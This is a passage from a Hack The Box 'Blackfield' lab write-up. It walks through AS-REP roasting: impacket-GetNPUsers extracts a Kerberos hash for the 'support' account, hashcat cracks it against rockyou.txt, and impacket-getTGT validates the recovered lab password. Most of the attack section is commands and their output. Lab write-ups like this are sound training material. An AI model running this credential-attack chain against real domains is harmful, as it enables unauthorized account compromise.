ASREPRoasting
A total of 333 valid domain users have been enumerated via the [[Blackfield_RID_Cycling#[RID Cycling](https //www.trustedsec.com/blog/new-tool-release-rpc_enum-rid-cycling-attack/)|RID Cycling]] technique
Additionally, the //dc01.blackfield.local/profiles$
share had so many directories that appear to be named after users. While these users have not been verified as valid domain users against the target Key Distribution Center (KDC), retaining them could be valuable for potential exploitation vectors in the future.
using the list of users from the [[blackfield_rid_cycling#[rid cycling](https //www.trustedsec.com/blog/new-tool-release-rpc_enum-rid-cycling-attack/)|rid cycling]] technique, i will attempt to see if any of those users have dont_req_preauth set
impacket-GetNPUsers
┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ impacket-GetNPUsers blackfield.local/@dc01.blackfield.local -usersfile users.txt -request -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
[...REDACTED...]
$krb5asrep$23$support@BLACKFIELD.LOCAL:66218f8855680578f98602b5455df6ba$fe10eca7fce8bcbd44db442ba0117190ca3c2792a6efbffde398aa35c02bd7d8c2a7b5eb65877f07f26aae188534c94f341d568ec54b0303d52fa27326332d6047d8b893b0d78746b19d2036955b7ee57eab75aa9b60582a9a6dd7fe8839c34f35af77da14cc13be3ae021014e0083ef8ce9a95703b87f38946b73e34daaa5a81eef393ef7f5525ab9c94e807a32ebbf4a20bcd34c5c7699e2d0e4c90f1bd34e4262925e2ea957ce588da25eeda4b7267351b052960c0da3a806ee9f49548e85d12395c7332d694f87c0f32222ce79eeb69bb93a6e25e7073d500853bca3bd2fe52d6611acec53b7488540100c44cb1ffaf2c145
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
The support
user has the DONT_REQ_PREAUTH bit set. This particular account has been initially enumerated by kerbrute in the earlier stage.
Additionally, KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) indicates that those users extracted from the //dc01.blackfield.local/profiles$
share are not domain users
Password Cracking
┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ hashcat --show support.hash
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol
┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ hashcat -a 0 -m 18200 support.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
dictionary cache hit:
* filename..: /usr/share/wordlists/rockyou.txt
* passwords.: 14344386
* bytes.....: 139921519
* keyspace..: 14344386
$krb5asrep$23$support@blackfield.local:66218f8855680578f98602b5455df6ba$fe10eca7fce8bcbd44db442ba0117190ca3c2792a6efbffde398aa35c02bd7d8c2a7b5eb65877f07f26aae188534c94f341d568ec54b0303d52fa27326332d6047d8b893b0d78746b19d2036955b7ee57eab75aa9b60582a9a6dd7fe8839c34f35af77da14cc13be3ae021014e0083ef8ce9a95703b87f38946b73e34daaa5a81eef393ef7f5525ab9c94e807a32ebbf4a20bcd34c5c7699e2d0e4c90f1bd34e4262925e2ea957ce588da25eeda4b7267351b052960c0da3a806ee9f49548e85d12395c7332d694f87c0f32222ce79eeb69bb93a6e25e7073d500853bca3bd2fe52d6611acec53b7488540100c44cb1ffaf2c145:#00^BlackKnight
session..........: hashcat
status...........: Cracked
hash.mode........: 18200 (Kerberos 5, etype 23, AS-REP)
hash.target......: $krb5asrep$23$support@BLACKFIELD.LOCAL:66218f885568...f2c145
time.started.....: Thu Dec 21 00:52:19 2023 (8 secs)
time.estimated...: Thu Dec 21 00:52:27 2023 (0 secs)
kernel.feature...: Pure Kernel
guess.base.......: File (/usr/share/wordlists/rockyou.txt)
guess.queue......: 1/1 (100.00%)
speed.#1.........: 1925.7 kH/s (0.92ms) @ Accel:512 Loops:1 Thr:1 Vec:8
recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
progress.........: 14337024/14344386 (99.95%)
rejected.........: 0/14337024 (0.00%)
restore.point....: 14333952/14344386 (99.93%)
restore.sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
candidate.engine.: Device Generator
candidates.#1....: #1crappers -> "$)(*(dolphins
hardware.mon.#1..: Util: 63%
started: Thu Dec 21 00:52:18 2023
stopped: Thu Dec 21 00:52:28 2023
hashcat cracked the password hash for the support
user
The cracked password is #00^BlackKnight
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ impacket-getTGT BLACKFIELD.LOCAL/support@dc01.blackfield.local -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
Password: #00^BlackKnight
[*] Saving ticket in support@dc01.blackfield.local.ccache
Credential validated for the support
user
TGT saved; support@dc01.blackfield.local.ccache